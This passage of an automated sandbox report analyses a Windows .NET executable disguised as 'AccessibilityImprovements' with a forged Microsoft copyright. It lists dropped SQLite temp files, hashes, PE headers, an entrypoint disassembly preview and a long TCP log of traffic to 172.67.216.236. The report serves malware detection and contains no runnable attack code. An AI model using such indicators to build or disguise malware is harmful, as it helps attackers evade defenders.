Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCA50.tmp Download File
Process:	C:\Users\user\Desktop\nE0BePfCtd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCA51.tmp Download File
Process:	C:\Users\user\Desktop\nE0BePfCtd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.396070743851721
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	nE0BePfCtd.exe
File size:	570880
MD5:	24d513394ee068f066ccbd604f4f718a
SHA1:	656f25c0fe6fec97a15216c457c79ad7ee2ea832
SHA256:	39a9af2e4dacff39613bf2e27af27ca9756c98e178d082337a28480c8bfcb1b2
SHA512:	90834515c3c648970e2ae78d8569e8d15b71a438a080aec484d63a18764329e2b93e87d633cfa4d36c0afbd5d32887de2eb856a89125def4c602caa2c3e6e7ba
SSDEEP:	12288:wLDZDClI8deneL2iNF2iNi4QissaMJcR/V:aDZ2lt1j1esId
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	f8d2a86961e8dc78

Static PE Info

General
Entrypoint:	0x48a3f6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xF3E8F2D9 [Thu Sep 3 14:46:49 2099 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add dword ptr [eax], A4380000h
or byte ptr [eax], al
cmp byte ptr [esi+53520008h], al
inc esp
push ebx
xchg eax, ebx
salc
sbb dword ptr [ebp-6Ah], esi
fimul word ptr [edx-56h]
mov ah, FFFFFFAAh
cmpsb
popfd
mov word ptr [edx+01h], seg?
add byte ptr [eax], al
add byte ptr [ebx+3Ah], al
pop esp
push ebp
jnc 00007F26ACE82FC7h
jc 00007F26ACE82FD5h
pop esp
inc ecx
insb
js 00007F26ACE82FDBh
pop esp
inc esp
jnc 00007F26ACE82FCEh
je 00007F26ACE82FD1h
jo 00007F26ACE82FBEh
push ecx
push edi
inc ebp
push edx
pop esp
inc esp
jbe 00007F26ACE82FCCh
arpl word ptr [ebp+43h], sp
jc 00007F26ACE82FC7h
outsb
je 00007F26ACE82FCBh
popad
insb
inc esp
jo 00007F26ACE82FCFh
outsd
jns 00007F26ACE82FCFh
outsb
je 00007F26ACE82FBEh
bound ebp, dword ptr [ecx+6Eh]
pop esp
push edx
insb
popad
jnc 00007F26ACE82FC7h
pop esp
push ebx
arpl word ptr [ebp+72h], si
pop esp
inc ecx
arpl word ptr [ebx+65h], sp
jnc 00007F26ACE82FD5h
imul esp, dword ptr [edx+69h], 7974696Ch
dec ecx
insd
jo 00007F26ACE82FD4h
outsd
jbe 00007F26ACE82FC7h
insd
outsb
je 00007F26ACE82FD5h
jo 00007F26ACE82FC7h
bound eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a39c	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8c000	0x2a4c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x90000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8a41c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x884bc	0x88600	False	0.499727887259	data	7.39879610147	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x8c000	0x2a4c	0x2c00	False	0.862215909091	data	7.40376187263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x90000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x8c130	0x22cd	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x8e400	0x14	data
RT_VERSION	0x8e414	0x44a	data
RT_MANIFEST	0x8e860	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Microsoft Corporation. All rights reserved.
Assembly Version	16.0.100.0
InternalName	AccessibilityImprovements.exe
FileVersion	16.0.100.0
CompanyName	AccessibilityImprovements
LegalTrademarks
Comments	AccessibilityImprovements
ProductName	AccessibilityImprovements
ProductVersion	16.0.100.0
FileDescription	AccessibilityImprovements
OriginalFilename	AccessibilityImprovements.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2021 19:39:24.765786886 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.782075882 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.782167912 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.783632994 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.799715996 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.818221092 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.818284035 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.818305969 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.818326950 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.818350077 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.818367958 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.818371058 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.818388939 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.818409920 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.818413973 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.818432093 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.818454027 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.818460941 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.818517923 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.819047928 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.819077969 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.819098949 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.819120884 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.819164991 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.819185019 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.819201946 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.820076942 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.820111036 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.820132971 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.820158005 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.820183039 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.820185900 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.820207119 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.820242882 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.821022987 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.821062088 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.821084023 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.821104050 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.821125031 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.821161032 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.821194887 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.821980953 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.822016954 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.822038889 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.822062016 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.822077036 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.822088003 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.822118044 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.822161913 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.834574938 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.834618092 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.834639072 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.834659100 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.834676027 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.834795952 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.834821939 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.834826946 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.834844112 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.834862947 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.834866047 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.834888935 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.834901094 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.835745096 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.835776091 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.835797071 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.835809946 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.835843086 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.835922003 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.835943937 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.836007118 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.836687088 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.836719990 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.836740971 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.836764097 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.836919069 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.837412119 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.837441921 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.837464094 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.837490082 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.837512016 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.837522030 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.837547064 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.838386059 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.838418961 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.838443995 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.838468075 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.838479042 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.838490963 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.838510990 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.838556051 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.839310884 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.839346886 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.839371920 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.839392900 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.839418888 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.839422941 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.839441061 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.840274096 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.840306997 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.840328932 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.840348959 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.840368032 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.840379953 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.840389967 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.840444088 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.841362953 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.841398001 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.841422081 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.841499090 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.841710091 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.841737032 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.841757059 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.841779947 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.841779947 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.841828108 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.841835976 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.841890097 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.842658043 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.842691898 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.842715025 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.842780113 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.850724936 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.850769997 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.850871086 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.850895882 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.850953102 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.850975037 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.850996971 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.851016045 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.851494074 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.851938963 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.851973057 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.851994038 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.852013111 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.852034092 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.852083921 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.852133989 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.852932930 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.852967024 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.852987051 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.853003025 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.853176117 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.853451967 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.853817940 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.853913069 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.853936911 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.853959084 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.853980064 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.854466915 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.854496956 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.854578972 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.854599953 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.854619980 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.854639053 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.855266094 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.855285883 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.855289936 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.856436014 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.856467009 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.856487036 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.856509924 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.856532097 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.856550932 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.857445955 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.857479095 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.857498884 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.857521057 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.857541084 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.857557058 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.857893944 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.857923031 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.857944965 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.857965946 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.857985020 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.858004093 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.858809948 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.858908892 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.858927965 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.858943939 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.858958960 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.864495993 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.867273092 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.867300987 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.867436886 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.868022919 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.868047953 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.868061066 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.868083954 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.868099928 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.868115902 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.868132114 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.868144035 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.868330956 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.868354082 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.868359089 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.869164944 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.869194984 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.869213104 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.869225025 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.869259119 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.869327068 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.872384071 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.872411013 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.872426033 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.872441053 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.872457027 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.872477055 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.872493029 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.872509003 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.872692108 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.872714996 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.880559921 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.880590916 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.880608082 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.880623102 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.880640030 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.880650997 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.880652905 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.880670071 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.880671978 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.880688906 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.880726099 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.880937099 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.880954981 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.880974054 CEST	80	49707	172.67.216.236	192.168.2.3
